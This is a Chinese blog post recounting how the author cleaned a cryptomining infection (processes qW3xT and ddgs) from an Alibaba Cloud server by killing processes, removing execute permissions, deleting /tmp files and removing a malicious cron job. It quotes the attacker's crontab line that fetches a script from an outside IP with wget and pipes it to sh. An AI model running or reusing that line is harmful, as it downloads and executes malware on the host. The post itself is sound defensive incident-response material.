记录一次阿里云服务器被挖矿木马攻击后的处理

博主周末收到阿里云异常登录提醒,周一发现CPU占用率高达100%,遭遇攻击。详细记录了从修改密码、查找高占用进程、杀死挖矿病毒到清除定时任务和病毒文件的全过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

周末收到阿里云异常登录的短信提醒,没有理会,周一上线看了眼,cpu占用100%,发现被攻击了。

先修改管理员的登录密码

1.查看top进程 
  发现一个进程qW3xT.3进程占用99.9%的cpu
百度下明显是挖矿病毒程序
kill -9 端口号
杀死之后,会发现一会又启动了
观察top发现有一个守护进程ddgs.3014先启动,然后隐藏

2.查看ddgs进程并杀掉
 ps -aux|grep ddgs
发现执行文件在/tmp目录下

先取消掉执行权限
chmod -x ddgs.3014
chmod -x qW3xT.3

一般这类病毒通过定时任务去下载,没找到根源的情况下,
删除了会重新下载的

留意目录/var/spool/cron 遇到不认识的连接 直接干掉
我的目录下就发现了一个/var/spool/cron/crontabs/root文件

文件内容
*/15 * * * * wget -q -o- http://149.56.106.215:8000/i.sh |sh

很明显的下载病毒的连接,直接删除。

3.删除/tmp 目录下的病毒文件,问题解决

4.查看top,再未发现相应的进程

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值